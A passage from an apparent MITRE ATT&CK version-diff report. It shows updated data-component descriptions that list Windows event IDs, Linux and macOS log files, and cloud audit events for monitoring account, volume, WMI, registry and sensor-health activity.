| g resource, often by providing credentials (ex: Windows EID | | service, or application to gain access to a network, system |
| 4776 or /var/log/auth.log) | | , or cloud-based resource. This typically involves credentia |
| | | ls such as passwords, tokens, multi-factor authentication (M |
| | | FA), or biometric validation. *Data Collection Measures:* |
| | | - Host-Based Authentication Logs - Windows Event Logs |
| | | - Event ID 4776 – NTLM authentication attempt. |
| | | - Event ID 4624 – Successful user logon. - Event ID |
| | | 4625 – Failed authentication attempt. - Event ID 46 |
| | | 48 – Explicit logon with alternate credentials. - Linux/ |
| | | macOS Authentication Logs - `/var/log/auth.log`, `/v |
| | | ar/log/secure` – Logs SSH, sudo, and other authentication at |
| | | tempts. - AuditD – Tracks authentication events via |
| | | PAM modules. - macOS Unified Logs – `/var/db/diagnos |
| | | tics` captures authentication failures. - Cloud Authenticati |
| | | on Logs - Azure AD Logs - Sign-in Logs – Tracks |
| | | authentication attempts, MFA challenges, and conditional acc |
| | | ess failures. - Audit Logs – Captures authentication |
| | | -related configuration changes. - Microsoft Graph AP |
| | | I – Provides real-time sign-in analytics. - Google Works |
| | | pace & Office 365 - Google Admin Console – `User Log |
| | | in Report` tracks login attempts and failures. - Off |
| | | ice 365 Unified Audit Logs – Captures logins across Exchange |
| | | , SharePoint, and Teams. - AWS CloudTrail & IAM |
| | | - Tracks authentication via `AWS IAM AuthenticateUser` and ` |
| | | sts:GetSessionToken`. - Logs failed authentications |
| | | to AWS Management Console and API requests. - Container Auth |
| | | entication Monitoring - Kubernetes Authentication Logs |
| | | - kubectl audit logs – Captures authentication attemp |
| | | ts for service accounts and admin users. - Azure Kub |
| | | ernetes Service (AKS) and Google Kubernetes Engine (GKE) – L |
| | | ogs IAM authentication events. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:19:46.282Z | 2025-04-18T15:09:42.067Z |
| description | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) | An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.
*Data Collection Measures:*
- Host-Based Authentication Logs
- Windows Event Logs
- Event ID 4776 – NTLM authentication attempt.
- Event ID 4624 – Successful user logon.
- Event ID 4625 – Failed authentication attempt.
- Event ID 4648 – Explicit logon with alternate credentials.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs SSH, sudo, and other authentication attempts.
- AuditD – Tracks authentication events via PAM modules.
- macOS Unified Logs – `/var/db/diagnostics` captures authentication failures.
- Cloud Authentication Logs
- Azure AD Logs
- Sign-in Logs – Tracks authentication attempts, MFA challenges, and conditional access failures.
- Audit Logs – Captures authentication-related configuration changes.
- Microsoft Graph API – Provides real-time sign-in analytics.
- Google Workspace & Office 365
- Google Admin Console – `User Login Report` tracks login attempts and failures.
- Office 365 Unified Audit Logs – Captures logins across Exchange, SharePoint, and Teams.
- AWS CloudTrail & IAM
- Tracks authentication via `AWS IAM AuthenticateUser` and `sts:GetSessionToken`.
- Logs failed authentications to AWS Management Console and API requests.
- Container Authentication Monitoring
- Kubernetes Authentication Logs
- kubectl audit logs – Captures authentication attempts for service accounts and admin users.
- Azure Kubernetes Service (AKS) and Google Kubernetes Engine (GKE) – Logs IAM authentication events. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new account (ex: Windows EID 4720 | t | The initial establishment of a new user, service, or machine |
| or /etc/passwd logs) | | account within an operating system, cloud environment, or i |
| | | dentity management system. *Data Collection Measures:* - H |
| | | ost-Based Logging - Windows Event Logs - Event I |
| | | D 4720 – A new user account was created. - Event ID |
| | | 4732/4735 – A user was added to a privileged group. |
| | | - Event ID 4798 – Enumeration of user accounts. - Linux/ |
| | | macOS Authentication Logs - `/var/log/auth.log`, `/v |
| | | ar/log/secure` – Logs `useradd`, `adduser`, `passwd`, and `g |
| | | roupmod` activities. - AuditD – Detects new account |
| | | creation via PAM (`useradd`, `usermod`). - OSQuery – |
| | | The `users` table tracks newly created accounts. - Cloud-Ba |
| | | sed Logging - Azure AD Logs - Azure AD Audit Log |
| | | s – Tracks new user and service account creation. - |
| | | Azure Graph API – Provides logs on new account provisioning. |
| | | - AWS IAM & CloudTrail Logs - CreateUser, Creat |
| | | eRole – Tracks new IAM user creation. - AttachRolePo |
| | | licy – Identifies privilege escalation via account creation. |
| | | - Google Workspace & Office 365 Logs - Google A |
| | | dmin Console – Logs user creation in User Accounts API. |
| | | - Microsoft 365 Unified Audit Log – Tracks new account p |
| | | rovisioning. - Container & Network Account Creation Logs |
| | | - Kubernetes Account Creation Logs - kubectl audit |
| | | logs – Detects new service account provisioning. - G |
| | | KE/Azure AKS Logs – Track new container service accounts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:54.515Z |
| description | Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs) | The initial establishment of a new user, service, or machine account within an operating system, cloud environment, or identity management system.
*Data Collection Measures:*
- Host-Based Logging
- Windows Event Logs
- Event ID 4720 – A new user account was created.
- Event ID 4732/4735 – A user was added to a privileged group.
- Event ID 4798 – Enumeration of user accounts.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs `useradd`, `adduser`, `passwd`, and `groupmod` activities.
- AuditD – Detects new account creation via PAM (`useradd`, `usermod`).
- OSQuery – The `users` table tracks newly created accounts.
- Cloud-Based Logging
- Azure AD Logs
- Azure AD Audit Logs – Tracks new user and service account creation.
- Azure Graph API – Provides logs on new account provisioning.
- AWS IAM & CloudTrail Logs
- CreateUser, CreateRole – Tracks new IAM user creation.
- AttachRolePolicy – Identifies privilege escalation via account creation.
- Google Workspace & Office 365 Logs
- Google Admin Console – Logs user creation in User Accounts API.
- Microsoft 365 Unified Audit Log – Tracks new account provisioning.
- Container & Network Account Creation Logs
- Kubernetes Account Creation Logs
- kubectl audit logs – Detects new service account provisioning.
- GKE/Azure AKS Logs – Track new container service accounts. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of an account (ex: Windows EID 4726 or /var/log acce | t | The removal of a user, service, or machine account from an o |
| ss/authentication logs) | | perating system, cloud identity management system, or direct |
| | | ory service. *Data Collection Measures:* - Host-Based Logg |
| | | ing - Windows Event Logs - Event ID 4726 – A use |
| | | r account was deleted. - Event ID 4733/4735 – A user |
| | | was removed from a privileged group. - Event ID 110 |
| | | 2 – Security log was cleared (potential cover-up). - Lin |
| | | ux/macOS Authentication Logs - `/var/log/auth.log`, |
| | | `/var/log/secure` – Logs `userdel`, `deluser`, `passwd -l`. |
| | | - AuditD – Tracks account deletions via PAM events ( |
| | | `userdel`). - OSQuery – The `users` table can detect |
| | | account removal. - Cloud-Based Logging - Azure AD Logs |
| | | - Azure AD Audit Logs – Tracks user and service acco |
| | | unt deletions. - Azure Graph API – Monitors identity |
| | | changes. - AWS IAM & CloudTrail Logs - `DeleteU |
| | | ser`, `DeleteRole` – Tracks IAM user deletion. - Det |
| | | achRolePolicy – Identifies privilege revocation before delet |
| | | ion. - Google Workspace & Office 365 Logs - Goog |
| | | le Admin Console – Logs user removal activities. - M |
| | | icrosoft 365 Unified Audit Log – Captures deleted accounts i |
| | | n Active Directory. - Container & Network Account Deletion L |
| | | ogs - Kubernetes Service Account Deletion - kube |
| | | ctl audit logs – Detects when service accounts are removed f |
| | | rom pods. - GKE/Azure AKS Logs – Track containerized |
| | | identity removals. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:57.711Z |
| description | Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs) | The removal of a user, service, or machine account from an operating system, cloud identity management system, or directory service.
*Data Collection Measures:*
- Host-Based Logging
- Windows Event Logs
- Event ID 4726 – A user account was deleted.
- Event ID 4733/4735 – A user was removed from a privileged group.
- Event ID 1102 – Security log was cleared (potential cover-up).
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs `userdel`, `deluser`, `passwd -l`.
- AuditD – Tracks account deletions via PAM events (`userdel`).
- OSQuery – The `users` table can detect account removal.
- Cloud-Based Logging
- Azure AD Logs
- Azure AD Audit Logs – Tracks user and service account deletions.
- Azure Graph API – Monitors identity changes.
- AWS IAM & CloudTrail Logs
- `DeleteUser`, `DeleteRole` – Tracks IAM user deletion.
- DetachRolePolicy – Identifies privilege revocation before deletion.
- Google Workspace & Office 365 Logs
- Google Admin Console – Logs user removal activities.
- Microsoft 365 Unified Audit Log – Captures deleted accounts in Active Directory.
- Container & Network Account Deletion Logs
- Kubernetes Service Account Deletion
- kubectl audit logs – Detects when service accounts are removed from pods.
- GKE/Azure AKS Logs – Track containerized identity removals. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to an account, such as permissions and/or membe | t | Changes made to an existing user, service, or machine accoun |
| rship in specific groups (ex: Windows EID 4738 or /var/log a | | t, including alterations to attributes, permissions, roles, |
| ccess/authentication logs) | | authentication methods, or group memberships. *Data Collect |
| | | ion Measures:* - Host-Based Logging - Windows Event Log |
| | | s - Event ID 4738 – A user account was changed. |
| | | - Event ID 4725 – A user account was disabled. - |
| | | Event ID 4724 – An attempt was made to reset an account's p |
| | | assword. - Event ID 4767 – A user account was unlock |
| | | ed. - Linux/macOS Authentication Logs - `/var/lo |
| | | g/auth.log`, `/var/log/secure` – Tracks account modification |
| | | s (`usermod`, `chage`, `passwd`). - AuditD – Monitor |
| | | s account changes (`useradd`, `usermod`, `gpasswd`). |
| | | - OSQuery – Queries the `users` table for recent modificati |
| | | ons. - Cloud-Based Logging - Azure AD Logs - Azu |
| | | re AD Audit Logs – Tracks modifications to users and securit |
| | | y groups. - Azure Graph API – Captures changes to au |
| | | thentication policies and MFA settings. - AWS IAM & Clou |
| | | dTrail Logs - `ModifyUser`, `UpdateLoginProfile` – C |
| | | aptures changes to IAM user attributes. - `AttachUse |
| | | rPolicy`, `AddUserToGroup` – Detects policy and group modifi |
| | | cations. - Google Workspace & Office 365 Logs - |
| | | Google Admin Console – Logs account changes, role modificati |
| | | ons, and group membership updates. - Microsoft 365 U |
| | | nified Audit Log – Captures modifications to security settin |
| | | gs and privileged account changes. - Container & Network Acc |
| | | ount Modification Logs - Kubernetes Service Account Chan |
| | | ges - kubectl audit logs – Detects service account m |
| | | odifications in Kubernetes clusters. - GKE/Azure AKS |
| | | Logs – Monitors role and permission changes. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:51.231Z |
| description | Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs) | Changes made to an existing user, service, or machine account, including alterations to attributes, permissions, roles, authentication methods, or group memberships.
*Data Collection Measures:*
- Host-Based Logging
- Windows Event Logs
- Event ID 4738 – A user account was changed.
- Event ID 4725 – A user account was disabled.
- Event ID 4724 – An attempt was made to reset an account's password.
- Event ID 4767 – A user account was unlocked.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Tracks account modifications (`usermod`, `chage`, `passwd`).
- AuditD – Monitors account changes (`useradd`, `usermod`, `gpasswd`).
- OSQuery – Queries the `users` table for recent modifications.
- Cloud-Based Logging
- Azure AD Logs
- Azure AD Audit Logs – Tracks modifications to users and security groups.
- Azure Graph API – Captures changes to authentication policies and MFA settings.
- AWS IAM & CloudTrail Logs
- `ModifyUser`, `UpdateLoginProfile` – Captures changes to IAM user attributes.
- `AttachUserPolicy`, `AddUserToGroup` – Detects policy and group modifications.
- Google Workspace & Office 365 Logs
- Google Admin Console – Logs account changes, role modifications, and group membership updates.
- Microsoft 365 Unified Audit Log – Captures modifications to security settings and privileged account changes.
- Container & Network Account Modification Logs
- Kubernetes Service Account Changes
- kubectl audit logs – Detects service account modifications in Kubernetes clusters.
- GKE/Azure AKS Logs – Monitors role and permission changes. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a cloud volume (ex: AWS create-volum | t | The initial provisioning of block storage volumes in cloud o |
| e) | | r on-prem environments, typically used for data storage, bac |
| | | kup, or workload scaling. *Data Collection Measures:* - Cl |
| | | oud-Based Logging & Monitoring - AWS CloudTrail |
| | | - `CreateVolume` – Logs the creation of new Amazon Elastic B |
| | | lock Store (EBS) volumes. - `RunInstances` – Can be |
| | | correlated to detect automatic volume provisioning. - Az |
| | | ure Monitor & Log Analytics - `Microsoft.Compute/dis |
| | | ks/write` – Captures creation of new managed/unmanaged disks |
| | | . - `Microsoft.Storage/storageAccounts/write` – Dete |
| | | cts creation of new Azure Blob Storage volumes. - Google |
| | | Cloud Logging (GCP) - `compute.disks.insert` – Trac |
| | | ks new persistent disk creation. - `compute.instance |
| | | s.attachDisk` – Logs attachment of a volume to a running VM. |
| | | - OpenStack Logs - `volume.create` – Captures n |
| | | ew storage volume provisioning. - `cinder.volume.cre |
| | | ate` – Logs OpenStack Cinder block storage creation. - Host- |
| | | Based & SIEM Detection - Linux/macOS System Logs |
| | | - `/var/log/syslog` & `/var/log/messages` – Detects new mou |
| | | nt points or attached storage. - `dmesg | grep "new |
| | | disk"` – Identifies kernel messages for volume attachment. |
| | | - AuditD: Tracks `mkfs` (filesystem creation) for new |
| | | volume provisioning. - Windows Event Logs - Eve |
| | | nt ID 1006 (Storage Management Events) – Captures disk volum |
| | | e creation. - Event ID 5145 (Object Access: File Sha |
| | | re) – Detects access to newly created storage shares. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:19.083Z |
| description | Initial construction of a cloud volume (ex: AWS create-volume) | The initial provisioning of block storage volumes in cloud or on-prem environments, typically used for data storage, backup, or workload scaling.
*Data Collection Measures:*
- Cloud-Based Logging & Monitoring
- AWS CloudTrail
- `CreateVolume` – Logs the creation of new Amazon Elastic Block Store (EBS) volumes.
- `RunInstances` – Can be correlated to detect automatic volume provisioning.
- Azure Monitor & Log Analytics
- `Microsoft.Compute/disks/write` – Captures creation of new managed/unmanaged disks.
- `Microsoft.Storage/storageAccounts/write` – Detects creation of new Azure Blob Storage volumes.
- Google Cloud Logging (GCP)
- `compute.disks.insert` – Tracks new persistent disk creation.
- `compute.instances.attachDisk` – Logs attachment of a volume to a running VM.
- OpenStack Logs
- `volume.create` – Captures new storage volume provisioning.
- `cinder.volume.create` – Logs OpenStack Cinder block storage creation.
- Host-Based & SIEM Detection
- Linux/macOS System Logs
- `/var/log/syslog` & `/var/log/messages` – Detects new mount points or attached storage.
- `dmesg | grep "new disk"` – Identifies kernel messages for volume attachment.
- AuditD: Tracks `mkfs` (filesystem creation) for new volume provisioning.
- Windows Event Logs
- Event ID 1006 (Storage Management Events) – Captures disk volume creation.
- Event ID 5145 (Object Access: File Share) – Detects access to newly created storage shares. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of a a cloud volume (ex: AWS delete-volume) | t | The removal of a cloud-based or on-premise block storage vol |
| | | ume. This action permanently deletes the allocated storage a |
| | | nd may result in data loss if not backed up. *Data Collecti |
| | | on Measures:* - Cloud Logging & APIs - AWS CloudTrail L |
| | | ogs - `eventName: DeleteVolume` (tracks volume delet |
| | | ions) - Azure Monitor Logs - `operationName: Mic |
| | | rosoft.Compute/disks/delete` - `status: Success | Fa |
| | | ilure` (flag unauthorized delete attempts) - Google Clou |
| | | d Audit Logs - `protoPayload.methodName: "v1.compute |
| | | .disks.delete"` - `authenticationInfo.principalEmail |
| | | ` (identifies the user deleting the volume) - System & Host- |
| | | Based Logging - Linux & macOS Logs: - `/var/log/ |
| | | syslog` or `/var/log/messages` for volume detach/deletion ac |
| | | tions - Windows Event Logs: - Event ID 98 (Stora |
| | | ge Class Memory) - Event ID 225 (Volume Removal Dete |
| | | cted) - Event ID 12 (Disk Removal Notification) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:25.575Z |
| description | Removal of a a cloud volume (ex: AWS delete-volume) | The removal of a cloud-based or on-premise block storage volume. This action permanently deletes the allocated storage and may result in data loss if not backed up.
*Data Collection Measures:*
- Cloud Logging & APIs
- AWS CloudTrail Logs
- `eventName: DeleteVolume` (tracks volume deletions)
- Azure Monitor Logs
- `operationName: Microsoft.Compute/disks/delete`
- `status: Success | Failure` (flag unauthorized delete attempts)
- Google Cloud Audit Logs
- `protoPayload.methodName: "v1.compute.disks.delete"`
- `authenticationInfo.principalEmail` (identifies the user deleting the volume)
- System & Host-Based Logging
- Linux & macOS Logs:
- `/var/log/syslog` or `/var/log/messages` for volume detach/deletion actions
- Windows Event Logs:
- Event ID 98 (Storage Class Memory)
- Event ID 225 (Volume Removal Detected)
- Event ID 12 (Disk Removal Notification) |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
WMI: WMI Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a WMI object, such as a filter, cons | t | Initial construction of a WMI object, such as a filter, cons |
| umer, subscription, binding, or provider (ex: Sysmon EIDs 19 | | umer, subscription, binding, or providers. *Data Collectio |
| -21) | | n Measures:* - Windows Security Event Logs: - Event ID |
| | | 5861 (WMI Permanent Event Subscription) - Event ID 5860 |
| | | (WMI Event Filter Activity) - Event ID 5857 (WMI Event C |
| | | onsumer Activity) - Sysmon Logs: - Sysmon Event ID 19 – |
| | | WMI Event Filter Created - Sysmon Event ID 20 – WMI Even |
| | | t Consumer Created - Sysmon Event ID 21 – WMI Event Bind |
| | | ing Created - Endpoint Detection & Response (EDR) - Dete |
| | | cts WMI-based persistence techniques. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:16:25.136Z |
| description | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or providers.
*Data Collection Measures:*
- Windows Security Event Logs:
- Event ID 5861 (WMI Permanent Event Subscription)
- Event ID 5860 (WMI Event Filter Activity)
- Event ID 5857 (WMI Event Consumer Activity)
- Sysmon Logs:
- Sysmon Event ID 19 – WMI Event Filter Created
- Sysmon Event ID 20 – WMI Event Consumer Created
- Sysmon Event ID 21 – WMI Event Binding Created
- Endpoint Detection & Response (EDR)
- Detects WMI-based persistence techniques. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening a Registry Key, typically to read the associated val | t | The action of opening a specific Windows Registry key, typic |
| ue (ex: Windows EID 4656) | | ally to read its associated value. This activity can be used |
| | | for system configuration, application settings retrieval, a |
| | | nd security policies. *Data Collection Measures:* - Window |
| | | s Event Logs - Event ID 4656 - Handle to an Object was R |
| | | equested: Logs attempts to open registry keys. - Event I |
| | | D 4663 - An Object was Accessed: Captures read/write operati |
| | | ons on registry keys. - Event ID 4657 - Registry Value M |
| | | odification: Useful for detecting changes to registry keys a |
| | | fter being accessed. - Sysmon - Sysmon Event ID 13 - Reg |
| | | istry Value Set: Captures modifications to existing registry |
| | | keys. - Endpoint Detection and Response (EDR) Solutions |
| | | - Provide telemetry on registry key access activities, espe |
| | | cially when linked to suspicious processes. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:12.634Z |
| description | Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656) | The action of opening a specific Windows Registry key, typically to read its associated value. This activity can be used for system configuration, application settings retrieval, and security policies.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4656 - Handle to an Object was Requested: Logs attempts to open registry keys.
- Event ID 4663 - An Object was Accessed: Captures read/write operations on registry keys.
- Event ID 4657 - Registry Value Modification: Useful for detecting changes to registry keys after being accessed.
- Sysmon
- Sysmon Event ID 13 - Registry Value Set: Captures modifications to existing registry keys.
- Endpoint Detection and Response (EDR) Solutions
- Provide telemetry on registry key access activities, especially when linked to suspicious processes. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new Registry Key (ex: Windows EID | t | Initial construction of a new registry key within the Window |
| 4656 or Sysmon EID 12) | | s operating system. *Data Collection Measures:* - Window |
| | | s Event Logs - Event ID 4656 - Registry Object Handle Re |
| | | quested: Tracks registry key access, including newly created |
| | | keys. - Event ID 4657 - Registry Value Modification: De |
| | | tects modifications to an existing registry key after creati |
| | | on. - Sysmon (System Monitor) for Windows - Sysmon Event |
| | | ID 12 - Registry Key Created: Logs when a new registry key |
| | | is created. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:09.376Z |
| description | Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12) | Initial construction of a new registry key within the Windows operating system.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4656 - Registry Object Handle Requested: Tracks registry key access, including newly created keys.
- Event ID 4657 - Registry Value Modification: Detects modifications to an existing registry key after creation.
- Sysmon (System Monitor) for Windows
- Sysmon Event ID 12 - Registry Key Created: Logs when a new registry key is created.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EI | t | The removal of a registry key within the Windows operating s |
| D 12) | | ystem. *Data Collection Measures:* - Windows Event Logs |
| | | - Event ID 4658 - Registry Key Handle Closed: Captures whe |
| | | n a handle to a registry key is closed, which may indicate d |
| | | eletion. - Event ID 4660 - Object Deleted: Logs when a r |
| | | egistry key is deleted. - Sysmon (System Monitor) for Window |
| | | s - Sysmon Event ID 12 - Registry Key Deleted: Logs when |
| | | a registry key is removed. - Sysmon Event ID 13 - Regis |
| | | try Value Deleted: Captures removal of specific registry val |
| | | ues. - Endpoint Detection and Response (EDR) Solutions - |
| | | Monitor registry deletions for suspicious behavior. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:03.268Z |
| description | Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12) | The removal of a registry key within the Windows operating system.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4658 - Registry Key Handle Closed: Captures when a handle to a registry key is closed, which may indicate deletion.
- Event ID 4660 - Object Deleted: Logs when a registry key is deleted.
- Sysmon (System Monitor) for Windows
- Sysmon Event ID 12 - Registry Key Deleted: Logs when a registry key is removed.
- Sysmon Event ID 13 - Registry Value Deleted: Captures removal of specific registry values.
- Endpoint Detection and Response (EDR) Solutions
- Monitor registry deletions for suspicious behavior. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a Registry Key and/or Key value (ex: Windows | t | Changes made to an existing registry key or its values. Thes |
| EID 4657 or Sysmon EID 13|14) | | e modifications can include altering permissions, modifying |
| | | stored data, or updating configuration settings. *Data Coll |
| | | ection Measures:* - Windows Event Logs - Event ID 4657 |
| | | - Registry Value Modified: Logs changes to registry values, |
| | | including modifications to startup entries, security setting |
| | | s, or system configurations. - Sysmon (System Monitor) for W |
| | | indows - Sysmon Event ID 13 - Registry Value Set: Captur |
| | | es changes to specific registry values. - Sysmon Event I |
| | | D 14 - Registry Key & Value Renamed: Logs renaming of regist |
| | | ry keys, which may indicate evasion attempts. - Endpoint Det |
| | | ection and Response (EDR) Solutions - Monitor registry m |
| | | odifications for suspicious behavior. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:11:59.993Z |
| description | Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14) | Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.
- Sysmon (System Monitor) for Windows
- Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.
- Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.
- Endpoint Detection and Response (EDR) Solutions
- Monitor registry modifications for suspicious behavior. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Patches
Sensor Health: Host Status
Current version: 1.1
|
|
|---|
| t | Logging, messaging, and other artifacts highlighting the hea | t | Logging, messaging, and other artifacts that highlight the h |
| lth of host sensors (ex: metrics, errors, and/or exceptions | | ealth and operational state of host-based security sensors, |
| from logging applications) | | such as Endpoint Detection and Response (EDR) agents, antivi |
| | | rus software, logging services, and system monitoring tools. |
| | | Monitoring sensor health is essential for detecting misconf |
| | | igurations, sensor failures, tampering, or deliberate securi |
| | | ty control evasion by adversaries. *Data Collection Measure |
| | | s:* - Windows Event Logs: - Event ID 1074 (System Shutd |
| | | own): Detects unexpected system reboots/shutdowns. - Eve |
| | | nt ID 6006 (Event Log Stopped): Logs when Windows event logg |
| | | ing is stopped. - Event ID 16 (Sysmon): Detects configur |
| | | ation state changes that may indicate log tampering. - E |
| | | vent ID 12 (Windows Defender Status Change) – Detects change |
| | | s in Windows Defender state. - Linux/macOS Monitoring: - |
| | | `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log` |
| | | - Journald (journalctl) for kernel and system alerts. - |
| | | Endpoint Detection and Response (EDR) Tools: - Monitor |
| | | agent health status, detect sensor tampering, and alert on m |
| | | issing telemetry. - Mobile Threat Intelligence Logs: - S |
| | | amsung Knox, SafetyNet, iOS Secure Enclave provide sensor he |
| | | alth status for mobile endpoints. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:22:45.613Z | 2025-04-18T15:16:18.582Z |
| description | Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) | Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.
- Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.
- Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.
- Event ID 12 (Windows Defender Status Change) – Detects changes in Windows Defender state.
- Linux/macOS Monitoring:
- `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`
- Journald (journalctl) for kernel and system alerts.
